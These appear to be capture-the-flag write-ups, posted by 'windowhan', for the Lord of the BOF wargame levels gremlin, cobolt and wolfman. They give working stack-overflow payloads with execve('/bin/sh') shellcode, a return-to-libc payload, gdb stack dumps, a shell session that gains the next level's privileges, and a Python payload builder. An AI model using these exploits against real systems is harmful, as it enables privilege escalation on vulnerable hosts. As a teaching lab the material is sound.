(gdb) r `python -c 'print "\xbf"*44+"\xec\xfc\xbf\xbf"'``python -c 'print "\x90"*300+"\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x99\xb0\x0b\xcd\x80"'`
Starting program: /home/orc/tmp/wolfman `python -c 'print "\xbf"*44+"\xec\xfc\xbf\xbf"'``python -c 'print "\x90"*300+"\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x99\xb0\x0b\xcd\x80"'`
옜옜옜옜옜옜옜옜옜옜옜옜옜옜옜옜옜옜옜옜옜옜賃옜릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱
릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱
릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱
릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱
릱릱릱릱릱릱릱릱릱릱릱릱릱릱1픐h//shh/bin됥PS됣솻
?

Breakpoint 1, 0x80485e7 in main ()
(gdb) x/200x $esp-100
0xbffffaf8:     0xfffffe75      0x4005d920      0x400143e0      0xbffffb1c
0xbffffb08:     0x40066070      0x40106980      0x4000ae60      0xbffffba4
0xbffffb18:     0xbffffb58      0x080485e3      0xbffffb30      0x00000000
0xbffffb28:     0x00000028      0x00000016      0x00000000      0x00000000
0xbffffb38:     0x00000000      0x00000000      0x00000000      0x00000000
0xbffffb48:     0x00000000      0x00000000      0x00000000      0x00000000
0xbffffb58:     0xbfbfbfbf      0xbfbffcec      0x90909090      0x90909090
0xbffffb68:     0x90909090      0x90909090      0x90909090      0x90909090
0xbffffb78:     0x90909090      0x90909090      0x90909090      0x90909090
0xbffffb88:     0x90909090      0x90909090      0x90909090      0x90909090
0xbffffb98:     0x90909090      0x90909090      0x90909090      0x90909090
0xbffffba8:     0x90909090      0x90909090      0x90909090      0x90909090
0xbffffbb8:     0x90909090      0x90909090      0x90909090      0x90909090
0xbffffbc8:     0x90909090      0x90909090      0x90909090      0x90909090
0xbffffbd8:     0x90909090      0x90909090      0x90909090      0x90909090
0xbffffbe8:     0x90909090      0x90909090      0x90909090      0x90909090
0xbffffbf8:     0x90909090      0x90909090      0x90909090      0x90909090
0xbffffc08:     0x90909090      0x90909090      0x90909090      0x90909090
0xbffffc18:     0x90909090      0x90909090      0x90909090      0x90909090
0xbffffc28:     0x90909090      0x90909090      0x90909090      0x90909090
0xbffffc38:     0x90909090      0x90909090      0x90909090      0x90909090
0xbffffc48:     0x90909090      0x90909090      0x90909090      0x90909090
0xbffffc58:     0x90909090      0x90909090      0x90909090      0x90909090
0xbffffc68:     0x90909090      0x90909090      0x90909090      0x90909090
0xbffffc78:     0x90909090      0x90909090      0x90909090      0x90909090
0xbffffc88:     0x90909090      0x6850c031      0x68732f2f      0x69622f68
0xbffffc98:     0x50e3896e      0x99e18953      0x80cd0bb0      0x6d6f6800
0xbffffca8:     0x726f2f65      0x6d742f63      0x6f772f70      0x616d666c
0xbffffcb8:     0xbfbf006e      0xbfbfbfbf      0xbfbfbfbf      0xbfbfbfbf
0xbffffcc8:     0xbfbfbfbf      0xbfbfbfbf      0xbfbfbfbf      0xbfbfbfbf
0xbffffcd8:     0xbfbfbfbf      0xbfbfbfbf      0xbfbfbfbf      0xfcecbfbf
0xbffffce8:     0x9090bfbf      0x90909090      0x90909090      0x90909090
0xbffffcf8:     0x90909090      0x90909090      0x90909090      0x90909090
0xbffffd08:     0x90909090      0x90909090      0x90909090      0x90909090
0xbffffd18:     0x90909090      0x90909090      0x90909090      0x90909090
0xbffffd28:     0x90909090      0x90909090      0x90909090      0x90909090
0xbffffd38:     0x90909090      0x90909090      0x90909090      0x90909090
0xbffffd48:     0x90909090      0x90909090      0x90909090      0x90909090
0xbffffd58:     0x90909090      0x90909090      0x90909090      0x90909090
0xbffffd68:     0x90909090      0x90909090      0x90909090      0x90909090
0xbffffd78:     0x90909090      0x90909090      0x90909090      0x90909090
0xbffffd88:     0x90909090      0x90909090      0x90909090      0x90909090
0xbffffd98:     0x90909090      0x90909090      0x90909090      0x90909090
0xbffffda8:     0x90909090      0x90909090      0x90909090      0x90909090
0xbffffdb8:     0x90909090      0x90909090      0x90909090      0x90909090
0xbffffdc8:     0x90909090      0x90909090      0x90909090      0x90909090
0xbffffdd8:     0x90909090      0x90909090      0x90909090      0x90909090
0xbffffde8:     0x90909090      0x90909090      0x90909090      0x90909090
0xbffffdf8:     0x90909090      0x90909090      0x90909090      0x90909090
0xbffffe08:     0x90909090      0x90909090      0x90909090      0xc0319090
(gdb)
(gdb) x/200x $esp
0xbffffb5c:     0xbfbffcec      0x90909090      0x90909090      0x90909090
0xbffffb6c:     0x90909090      0x90909090      0x90909090      0x90909090
0xbffffb7c:     0x90909090      0x90909090      0x90909090      0x90909090
0xbffffb8c:     0x90909090      0x90909090      0x90909090      0x90909090
0xbffffb9c:     0x90909090      0x90909090      0x90909090      0x90909090
0xbffffbac:     0x90909090      0x90909090      0x90909090      0x90909090
0xbffffbbc:     0x90909090      0x90909090      0x90909090      0x90909090
0xbffffbcc:     0x90909090      0x90909090      0x90909090      0x90909090
0xbffffbdc:     0x90909090      0x90909090      0x90909090      0x90909090
0xbffffbec:     0x90909090      0x90909090      0x90909090      0x90909090
0xbffffbfc:     0x90909090      0x90909090      0x90909090      0x90909090
0xbffffc0c:     0x90909090      0x90909090      0x90909090      0x90909090
0xbffffc1c:     0x90909090      0x90909090      0x90909090      0x90909090
0xbffffc2c:     0x90909090      0x90909090      0x90909090      0x90909090
0xbffffc3c:     0x90909090      0x90909090      0x90909090      0x90909090
0xbffffc4c:     0x90909090      0x90909090      0x90909090      0x90909090
0xbffffc5c:     0x90909090      0x90909090      0x90909090      0x90909090
0xbffffc6c:     0x90909090      0x90909090      0x90909090      0x90909090
0xbffffc7c:     0x90909090      0x90909090      0x90909090      0x90909090
0xbffffc8c:     0x6850c031      0x68732f2f      0x69622f68      0x50e3896e
0xbffffc9c:     0x99e18953      0x80cd0bb0      0x6d6f6800      0x726f2f65
0xbffffcac:     0x6d742f63      0x6f772f70      0x616d666c      0xbfbf006e
0xbffffcbc:     0xbfbfbfbf      0xbfbfbfbf      0xbfbfbfbf      0xbfbfbfbf
0xbffffccc:     0xbfbfbfbf      0xbfbfbfbf      0xbfbfbfbf      0xbfbfbfbf
0xbffffcdc:     0xbfbfbfbf      0xbfbfbfbf      0xfcecbfbf      0x9090bfbf
0xbffffcec:     0x90909090      0x90909090      0x90909090      0x90909090
0xbffffcfc:     0x90909090      0x90909090      0x90909090      0x90909090
0xbffffd0c:     0x90909090      0x90909090      0x90909090      0x90909090
0xbffffd1c:     0x90909090      0x90909090      0x90909090      0x90909090
0xbffffd2c:     0x90909090      0x90909090      0x90909090      0x90909090
0xbffffd3c:     0x90909090      0x90909090      0x90909090      0x90909090
0xbffffd4c:     0x90909090      0x90909090      0x90909090      0x90909090
0xbffffd5c:     0x90909090      0x90909090      0x90909090      0x90909090
0xbffffd6c:     0x90909090      0x90909090      0x90909090      0x90909090
0xbffffd7c:     0x90909090      0x90909090      0x90909090      0x90909090
0xbffffd8c:     0x90909090      0x90909090      0x90909090      0x90909090
0xbffffd9c:     0x90909090      0x90909090      0x90909090      0x90909090
0xbffffdac:     0x90909090      0x90909090      0x90909090      0x90909090
0xbffffdbc:     0x90909090      0x90909090      0x90909090      0x90909090
0xbffffdcc:     0x90909090      0x90909090      0x90909090      0x90909090
0xbffffddc:     0x90909090      0x90909090      0x90909090      0x90909090
0xbffffdec:     0x90909090      0x90909090      0x90909090      0x90909090
0xbffffdfc:     0x90909090      0x90909090      0x90909090      0x90909090
0xbffffe0c:     0x90909090      0x90909090      0xc0319090      0x2f2f6850
0xbffffe1c:     0x2f686873      0x896e6962      0x895350e3      0x0bb099e1
0xbffffe2c:     0x000080cd      0x00000000      0x00000000      0x00000000
0xbffffe3c:     0x00000000      0x00000000      0x00000000      0x00000000
0xbffffe4c:     0x00000000      0x00000000      0x00000000      0x00000000
0xbffffe5c:     0x00000000      0x00000000      0x00000000      0x00000000
0xbffffe6c:     0x00000000      0x00000000      0x00000000      0x00000000
(gdb) q
The program is running.  Exit anyway? (y or n) y
[orc@localhost tmp]$ ./wolfman `python -c 'print "\xbf"*44+"\xec\xfd\xff\xbf"'` `python -c 'print "\x90"*300+"\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x99\xb0\x0b\xcd\x80"'`
옜옜옜옜옜옜옜옜옜옜옜옜옜옜옜옜옜옜옜옜옜옜入?릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱
릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱
릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱
릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱
릱릱릱릱릱릱릱릱릱릱릱릱릱릱?픐h//shh/bin됥PS됣솻
?
bash$ id
uid=504(orc) gid=504(orc) groups=504(orc)
bash$ q
sh: q: command not found
bash$ exit
exit
[orc@localhost tmp]$ ls
core  wolfman
[orc@localhost tmp]$ rm core
[orc@localhost tmp]$ cd ../
[orc@localhost orc]$ ./wolfman `python -c 'print "\xbf"*44+"\xec\xfd\xff\xbf"'` `python -c 'print "\x90"*300+"\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x99\xb0\x0b\xcd\x80"'`
옜옜옜옜옜옜옜옜옜옜옜옜옜옜옜옜옜옜옜옜옜옜入?릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱
릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱
릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱
릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱
릱릱릱릱릱릱릱릱릱릱릱릱릱릱?픐h//shh/bin됥PS됣솻
?
bash$ id
uid=504(orc) gid=504(orc) euid=505(wolfman) egid=505(wolfman) groups=504(orc)
bash$ my-pass
euid = 505
love eyuna
bash$


Posted by windowhan


 

 

The buffer is too cramped to fit shellcode...

(Actually, even if the buffer weren't small, I didn't want to use shellcode because it's so messy -_-;;)

Anyway, I thought of two approaches.

Using an environment variable, and RTL (return-to-libc).

After solving it I searched for other write-ups, and someone called Sasin solved it in quite a unique way.

Apparently, if you use argv[2], that cramped buffer is no problem at all(?)

Put a NOP sled + shellcode in argv[2]; argv[1] gets copied into the buffer, and the return address past the buffer is overwritten with the address of argv[2].

The details are at http://0xffff.tistory.com/entry/Sasin-0xffff-BOF%EC%9B%90%EC%A0%95%EB%8C%80-2-gremlin-cobolt

Many people actually solve it with an environment variable, but I'll solve it using the system function.

0x40058ae0 is the address of system.

Now let's find the address of a "/bin/sh" string to use as the argument...

The following is the source for finding the address of /bin/sh.

Running it like that prints the address.

And, briefly, the payload is laid out as

[buffer + ebp (20 bytes)] + [ret (4 bytes)] + [dummy (4 bytes)] + [argument (4 bytes)]

Here is the actual payload:

./cobolt $(python -c 'print "a"*20+"\xe0\x8a\x05\x40"+"aaaa"+"\xf9\xbf\x0f\x40"')

Let's look at the result.

clear!!

 

 

 

 

Posted by windowhan

A classic buffer overflow challenge where the shellcode goes into the buffer.

It's called "simple BOF", and I remember struggling at first to get root on the older RedHat 6.2 version of this.

The buffer size is 256.

Let's look at the payload layout briefly.

[buffer (256 bytes)] + [ebp (4 bytes)] + [ret (4 bytes)]

That's the payload layout in brief.

From the start of buffer through ebp is 260 bytes.

So we just put the NOP sled and shellcode in there.

The payload is as follows.

$(python -c 'print "\x90"*200 + "\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x99\xb0\x0b\xcd\x80" + "\x90"*36')

A NOP sled just keeps handing control to the next instruction, so it's enough to overwrite ret with roughly any address where the 0x90 bytes sit.

(gdb) x/100x $esp-100
0xbffffbb8:     0x90909090      0x90909090      0x90909090      0x90909090
0xbffffbc8:     0x90909090      0x90909090      0x90909090      0x90909090
0xbffffbd8:     0x90909090      0x90909090      0x6850c031      0x68732f2f
0xbffffbe8:     0x69622f68      0x50e3896e      0x99e18953      0x80cd0bb0
0xbffffbf8:     0x90909090      0x90909090      0x90909090      0x90909090
0xbffffc08:     0x90909090      0x90909090      0x90909090      0x90909090
0xbffffc18:     0x90909090      0x4000fdf4      0x00000002      0xbffffc64
0xbffffc28:     0xbffffc70      0x40013868      0x00000002      0x08048380
0xbffffc38:     0x00000000      0x080483a1      0x08048430      0x00000002
0xbffffc48:     0xbffffc64      0x080482e0      0x080484bc      0x4000ae60
0xbffffc58:     0xbffffc5c      0x40013e90      0x00000002      0xbffffd50
0xbffffc68:     0xbffffd67      0x00000000      0xbffffe6e      0xbffffe90
0xbffffc78:     0xbffffe9a      0xbffffea8      0xbffffec7      0xbffffed4
0xbffffc88:     0xbffffeed      0xbfffff07      0xbfffff11      0xbfffff1f
0xbffffc98:     0xbfffff5f      0xbfffff6f      0xbfffff84      0xbfffff94
0xbffffca8:     0xbfffff9e      0xbfffffba      0xbfffffc5      0xbfffffd2
0xbffffcb8:     0xbfffffda      0x00000000      0x00000003      0x08048034
0xbffffcc8:     0x00000004      0x00000020      0x00000005      0x00000006
0xbffffcd8:     0x00000006      0x00001000      0x00000007      0x40000000
0xbffffce8:     0x00000008      0x00000000      0x00000009      0x08048380
0xbffffcf8:     0x0000000b      0x000001f4      0x0000000c      0x000001f4
0xbffffd08:     0x0000000d      0x000001f4      0x0000000e      0x000001f4
0xbffffd18:     0x00000010      0x0febfbff      0x0000000f      0xbffffd4b
0xbffffd28:     0x00000000      0x00000000      0x00000000      0x00000000
0xbffffd38:     0x00000000      0x00000000      0x00000000      0x00000000
(gdb)
0xbffffd48:     0x69000000      0x00363836      0x6d6f682f      0x61672f65
0xbffffd58:     0x742f6574      0x672f706d      0x6c6d6572      0x90006e69
0xbffffd68:     0x90909090      0x90909090      0x90909090      0x90909090
0xbffffd78:     0x90909090      0x90909090      0x90909090      0x90909090
0xbffffd88:     0x90909090      0x90909090      0x90909090      0x90909090
0xbffffd98:     0x90909090      0x90909090      0x90909090      0x90909090
0xbffffda8:     0x90909090      0x90909090      0x90909090      0x90909090
0xbffffdb8:     0x90909090      0x90909090      0x90909090      0x90909090
0xbffffdc8:     0x90909090      0x90909090      0x90909090      0x90909090
0xbffffdd8:     0x90909090      0x90909090      0x90909090      0x90909090
0xbffffde8:     0x90909090      0x90909090      0x90909090      0x90909090
0xbffffdf8:     0x90909090      0x90909090      0x90909090      0x90909090
0xbffffe08:     0x90909090      0x90909090      0x90909090      0x90909090
0xbffffe18:     0x90909090      0x90909090      0x90909090      0x90909090
0xbffffe28:     0x90909090      0x31909090      0x2f6850c0      0x6868732f
0xbffffe38:     0x6e69622f      0x5350e389      0xb099e189      0x9080cd0b
0xbffffe48:     0x90909090      0x90909090      0x90909090      0x90909090
0xbffffe58:     0x90909090      0x90909090      0x90909090      0x90909090
0xbffffe68:     0xf4909090      0x454c00fd      0x504f5353      0x7c3d4e45
0xbffffe78:     0x7273752f      0x6e69622f      0x73656c2f      0x70697073
0xbffffe88:     0x68732e65      0x00732520      0x52455355      0x454d414e
0xbffffe98:     0x4948003d      0x49535453      0x313d455a      0x00303030
0xbffffea8:     0x54534f48      0x454d414e      0x636f6c3d      0x6f686c61
0xbffffeb8:     0x6c2e7473      0x6c61636f      0x616d6f64      0x4c006e69
0xbffffec8:     0x414e474f      0x673d454d      0x00657461      0x4f4d4552
(gdb)
0xbffffed8:     0x4f484554      0x353d5453      0x36322e39      0x3931312e
0xbffffee8:     0x3636312e      0x49414d00      0x762f3d4c      0x732f7261
0xbffffef8:     0x6c6f6f70      0x69616d2f      0x61672f6c      0x54006574
0xbfffff08:     0x3d4d5245      0x69736e61      0x534f4800      0x50595454
0xbfffff18:     0x33693d45      0x50003638      0x3d485441      0x7273752f
0xbfffff28:     0x636f6c2f      0x622f6c61      0x2f3a6e69      0x3a6e6962
0xbfffff38:     0x7273752f      0x6e69622f      0x73752f3a      0x31582f72
0xbfffff48:     0x2f365231      0x3a6e6962      0x6d6f682f      0x61672f65
0xbfffff58:     0x622f6574      0x48006e69      0x3d454d4f      0x6d6f682f
0xbfffff68:     0x61672f65      0x49006574      0x5455504e      0x2f3d4352
0xbfffff78:     0x2f637465      0x75706e69      0x00637274      0x4c454853
0xbfffff88:     0x622f3d4c      0x622f6e69      0x00687361      0x52455355
0xbfffff98:     0x7461673d      0x41420065      0x455f4853      0x2f3d564e
0xbfffffa8:     0x656d6f68      0x7461672f      0x622e2f65      0x72687361
0xbfffffb8:     0x414c0063      0x653d474e      0x53555f6e      0x54534f00
0xbfffffc8:     0x3d455059      0x756e694c      0x48530078      0x3d4c564c
0xbfffffd8:     0x534c0031      0x4c4f435f      0x3d53524f      0x6f682f00
0xbfffffe8:     0x672f656d      0x2f657461      0x2f706d74      0x6d657267
0xbffffff8:     0x006e696c      0x00000000      Cannot access memory at address 0xc0000000

 

Let's roughly set the return address to 0xbffffdf8...

That completes the payload.

./gremlin $(python -c 'print "\x90"*200 + "\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x99\xb0\x0b\xcd\x80" + "\x90"*36+"\xf8\xfd\xff\xbf"')

Success!

I went to the trouble of solving it with shellcode for nothing...
Now that I know it's the old version, if there's no extra protection, just break it in one shot!
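The "pick an address somewhere in the 0x90s" step above can be checked mechanically instead of by eye. The following is an added example (not the author's code): it parses the `x/100x` dump lines that cover argv[1], locates the NOP sled and the 24-byte shellcode, confirms that 0xbffffdf8 lands inside the sled, and verifies that the bytes in front of the return address are exactly the 260 (256 buffer + 4 ebp) the layout calls for. The dump rows are copied from the page; the function names and the `x/Nx` line format assumption are mine.

```python
"""Read a gdb `x/Nx` stack dump, find the NOP sled and shellcode, and check
where a candidate return address lands.

Added example for this write-up, not the author's code.  It assumes the dump
was taken with `x/Nx` on the 32-bit x86 target (4-byte little-endian words).
"""
import re
import struct

# Input copied from the gate -> gremlin `x/100x $esp-100` dump above: the
# rows covering argv[1] on the stack (0xbffffd58 .. 0xbffffe77).
SAMPLE_DUMP = """
0xbffffd58:     0x742f6574      0x672f706d      0x6c6d6572      0x90006e69
0xbffffd68:     0x90909090      0x90909090      0x90909090      0x90909090
0xbffffd78:     0x90909090      0x90909090      0x90909090      0x90909090
0xbffffd88:     0x90909090      0x90909090      0x90909090      0x90909090
0xbffffd98:     0x90909090      0x90909090      0x90909090      0x90909090
0xbffffda8:     0x90909090      0x90909090      0x90909090      0x90909090
0xbffffdb8:     0x90909090      0x90909090      0x90909090      0x90909090
0xbffffdc8:     0x90909090      0x90909090      0x90909090      0x90909090
0xbffffdd8:     0x90909090      0x90909090      0x90909090      0x90909090
0xbffffde8:     0x90909090      0x90909090      0x90909090      0x90909090
0xbffffdf8:     0x90909090      0x90909090      0x90909090      0x90909090
0xbffffe08:     0x90909090      0x90909090      0x90909090      0x90909090
0xbffffe18:     0x90909090      0x90909090      0x90909090      0x90909090
0xbffffe28:     0x90909090      0x31909090      0x2f6850c0      0x6868732f
0xbffffe38:     0x6e69622f      0x5350e389      0xb099e189      0x9080cd0b
0xbffffe48:     0x90909090      0x90909090      0x90909090      0x90909090
0xbffffe58:     0x90909090      0x90909090      0x90909090      0x90909090
0xbffffe68:     0xf4909090      0x454c00fd      0x504f5353      0x7c3d4e45
"""

# The 24-byte execve("/bin/sh") shellcode used throughout these write-ups.
SHELLCODE = bytes.fromhex("31c050682f2f7368682f62696e89e3505389e199b00bcd80")

LINE_RE = re.compile(r"^(0x[0-9a-f]+):\s+((?:0x[0-9a-f]{8}\s*)+)$")


def parse_dump(text):
    """Return (base_address, bytes) for a contiguous gdb x/Nx dump.

    Each 0xXXXXXXXX word is a little-endian value at addr + 4*i.  Rows that
    are not dump lines (prompts, pager text) are skipped; an address gap
    raises, because the bytes would no longer be contiguous."""
    base, mem = None, bytearray()
    for line in text.splitlines():
        m = LINE_RE.match(line.strip())
        if not m:
            continue
        addr = int(m.group(1), 16)
        if base is None:
            base = addr
        elif addr != base + len(mem):
            raise ValueError("dump is not contiguous at %#x" % addr)
        for word in m.group(2).split():
            mem += struct.pack("<I", int(word, 16))
    return base, bytes(mem)


def find_sled(base, mem, shellcode=SHELLCODE, nop=0x90):
    """Return (sled_start, sled_len, shellcode_addr), or None if absent."""
    idx = mem.find(shellcode)
    if idx < 0:
        return None
    start = idx
    while start > 0 and mem[start - 1] == nop:  # walk back over the NOPs
        start -= 1
    return base + start, idx - start, base + idx


def ret_hits_sled(ret, sled_start, sled_len):
    """True if `ret` points at one of the sled's NOPs (any of them works)."""
    return sled_start <= ret < sled_start + sled_len


def build_payload(nops, shellcode, pad, ret):
    """Build [nops][shellcode][pad][ret]; also return the offset of ret.
    For gremlin the body must be 260 bytes (256 buffer + 4 saved ebp)."""
    body = b"\x90" * nops + shellcode + b"\x90" * pad
    return body + struct.pack("<I", ret), len(body)
```

Run against the page's own dump, the sled is reported at 0xbffffd67 with 200 NOPs and the shellcode at 0xbffffe2f, so 0xbffffdf8 is a valid choice while 0xbffffe2f (the shellcode itself) is not.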


 

Posted by windowhan